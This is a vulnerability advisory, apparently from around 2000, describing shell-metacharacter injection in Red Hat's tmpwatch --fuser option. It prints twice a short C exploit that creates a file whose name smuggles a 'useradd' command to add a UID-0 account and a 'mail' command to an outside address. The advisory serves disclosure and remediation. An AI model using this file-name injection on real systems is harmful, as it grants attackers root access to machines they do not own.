
Impact: 
This vulnerability may allow local attackers to compromise superuser 
access if the administrator in a non-default manner uses tmpwatch. 

The tmpwatch tool removes files that have not been modified or accessed 
within a specified amount of time. It was designed to securely remove 
files by avoiding typical race condition vulnerabilities. System 
administrators usually run this tool periodically to remove old temporary 
files in world-writeable directories. 

The tmpwatch tool uses the --fuser or -s options to avoid removing a file 
that is in an open state in another process. This option uses the 
system() library subroutine to call the external program /sbin/fuser with 
the file name being examined as an argument. The system() subroutine 
spawns a shell to execute the command. An attacker may create a file name 
containing shell metacharacters, which could allow them to execute 
arbitrary commands if tmpwatch with the fuser option is used to remove the 
file. 

Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch 
packages suggests this vulnerability was recognized and a fix was 
attempted. However, the fix is incorrect, and the vulnerability is still 
exploitable. 

Exploit: 
1. Compile and run: 
#include <stdio.h> 

int main() 
{ 
FILE *f; 
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail 
haks0r@somehost.com<blablabla"; 

if((f = fopen(filename, "a")) == 0) { 
perror("Could not create file"); 
exit(1); 
} 
close(f); 
} 

2. cp /usr/sbin/adduser /tmp 
3. Just wait for mail. 
Recommendations: 
Do not use the --fuser or -s options with tmpwatch. 

Red Hat has issued the following RPMs that contain fixes for this 
vulnerability 


COMMAND 

tmpwatch 

SYSTEMS AFFECTED 

tmpwatch 2.2, 2.5.1 

PROBLEM 

Following is based on a Internet Security Systems Security 
Advisory. The tmpwatch utility is used in Red Hat Linux to remove 
temporary files. This utility has an option to call the "fuser" 
program, which verifies if a file is currently opened by a 
process. The fuser program is invoked within tmpwatch by calling 
the system() library subroutine. Insecure handling of the 
arguments to this subroutine could potentially allow an attacker 
to execute arbitrary commands. 

This vulnerability may allow local attackers to compromise 
superuser access if tmpwatch is used by the administrator in a 
non-default manner. 

Affected versions: 

Red Hat Linux 7.0 (tmpwatch v2.5.1) 
Red Hat Linux 6.2 (tmpwatch v2.2) 

Use the 'rpm -q tmpwatch' command to verify which version is 
installed. The tmpwatch package as well as the package containing 
fuser are included in the default base installation. By default, 
tmpwatch with the fuser option is not used in any package shipped 
with the Red Hat distributions. 

The tmpwatch tool removes files that have not been modified or 
accessed within a specified amount of time. It was designed to 
securely remove files by avoiding typical race condition 
vulnerabilities. System administrators usually run this tool 
periodically to remove old temporary files in world-writeable 
directories. 

The tmpwatch tool uses the --fuser or -s options to avoid removing 
a file that is in an open state in another process. This option 
uses the system() library subroutine to call the external program 
/sbin/fuser with the file name being examined as an argument. The 
system() subroutine spawns a shell to execute the command. An 
attacker may create a file name containing shell metacharacters, 
which could allow them to execute arbitrary commands if tmpwatch 
with the fuser option is used to remove the file. 

Source code comparison between the Red Hat Linux 6.2 and 7.0 
tmpwatch packages suggests this vulnerability was recognized and 
a fix was attempted. However, the fix is incorrect, and the 
vulnerability is still exploitable. 

Here is a simple example of Alexander Y. Yurchenko playing with 
tmpwatch bug: 

1. Execute following in /tmp 

#include <stdio.h> 

int main() 
{ 
FILE *f; 
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail 
haks0r@somehost.com<blablabla"; 

if((f = fopen(filename, "a")) == 0) { 
perror("Could not create file"); 
exit(1); 
} 
close(f); 
} 

2. cp /usr/sbin/adduser /tmp 
3. Just wait for mail 


SOLUTION 

Contact Safe Networks